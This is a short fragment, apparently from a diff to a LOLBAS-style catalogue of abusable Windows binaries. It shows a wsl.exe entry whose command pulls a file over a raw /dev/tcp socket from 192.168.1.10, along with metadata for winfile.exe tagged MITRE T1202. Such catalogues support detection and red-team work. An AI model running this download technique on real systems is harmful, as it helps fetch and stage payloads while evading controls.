- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\winfile.exe
- Path: C:\Windows\winfile.exe